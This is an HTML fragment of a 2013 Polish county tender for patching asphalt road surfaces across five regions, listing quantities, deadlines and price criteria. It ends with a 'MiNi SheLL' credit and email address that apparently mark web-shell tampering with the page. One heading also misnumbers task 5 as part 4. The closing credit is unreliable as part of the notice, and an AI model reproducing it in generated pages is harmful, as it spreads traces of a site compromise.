<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A)  ZADANIE 1 - REJON I
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu remontu cząstkowego nawierzchni bitumicznych mieszankami mineralno-asfaltowymi na gorąco z mechanicznym obcinaniem krawędzi piłą spalinową, z użyciem frezarki i masą na zimno, a także regulacji wysokościowej wpustów oraz studni kanalizacji deszczowej.
Zakres rzeczowy zadania nr 1 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych z bieżącej eksploatacji. Szacuje się wbudowanie do 150 ton mieszanki mineralno-asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych (z tego do 100 ton w okresie do 30 maja 2013 r.), do 20 ton mieszanki mineralno - asfaltowej na zimno, do 1490 m2 remontu nawierzchni bitumicznych masą mineralno-asfaltową na gorąco z użyciem frezarki (z tego do 800 m2 w terminie do 30 maja 2013 r.) oraz przeprowadzenie regulacji wysokościowej do 20 sztuk wpustów kanalizacji deszczowej i do 10 sztuk studni kanalizacji deszczowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych 
na terenie Powiatu Wodzisławskiego w 2013roku:
		 Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2 - REJON II
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu remontu cząstkowego nawierzchni bitumicznych mieszankami mineralno-asfaltowymi na gorąco z mechanicznym obcinaniem krawędzi piłą spalinową, z użyciem frezarki i masą na zimno, a także regulacji wysokościowej wpustów oraz studni kanalizacji deszczowej.
Zakres rzeczowy zadania nr 2 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych z bieżącej eksploatacji. Szacuje się wbudowanie do 150 ton mieszanki mineralno-asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych (z tego do 100 ton w okresie do 30 maja 2013 r.), do 20 ton mieszanki mineralno - asfaltowej na zimno, do 1490 m2 remontu nawierzchni bitumicznych masą mineralno-asfaltową na gorąco z użyciem frezarki (z tego do 800 m2 w terminie do 30 maja 2013 r.) oraz przeprowadzenie regulacji wysokościowej do 20 sztuk wpustów kanalizacji deszczowej i do 10 sztuk studni kanalizacji deszczowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych 
na terenie Powiatu Wodzisławskiego w 2013roku:
Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3 - REJON III
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu remontu cząstkowego nawierzchni bitumicznych mieszankami mineralno-asfaltowymi na gorąco z mechanicznym obcinaniem krawędzi piłą spalinową, z użyciem frezarki i masą na zimno, a także regulacji wysokościowej wpustów oraz studni kanalizacji deszczowej.
Zakres rzeczowy zadania nr 3 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych z bieżącej eksploatacji. Szacuje się wbudowanie do 150 ton mieszanki mineralno-asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych (z tego do 100 ton w okresie do 30 maja 2013 r.), do 20 ton mieszanki mineralno - asfaltowej na zimno, do 1490 m2 remontu nawierzchni bitumicznych masą mineralno-asfaltową na gorąco z użyciem frezarki (z tego ok. 800 m2 w terminie do 30 maja 2013 r.) oraz przeprowadzenie regulacji wysokościowej do 20 sztuk wpustów kanalizacji deszczowej i do. 10 sztuk studni kanalizacji deszczowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych 
na terenie Powiatu Wodzisławskiego w 2013roku:
Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 4 - REJON IV
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu naprawy uszkodzeń nawierzchni bitumicznych mieszaniną grysowo-emulsyjną wbudowaną pod ciśnieniem za pomocą remonterów drogowych.

Przewiduje się wbudowanie łącznie do 310 ton mieszaniny grysowo-emulsyjnej na sieci dróg powiatowych rejonu IV..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych na terenie Powiatu Wodzisławskiego w 2013roku:
Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 5 - REJON V
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu naprawy uszkodzeń nawierzchni bitumicznych mieszaniną grysowo-emulsyjną wbudowaną pod ciśnieniem za pomocą remonterów drogowych.

Przewiduje się wbudowanie łącznie do 310 ton mieszaniny grysowo-emulsyjnej na sieci dróg powiatowych rejonu V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com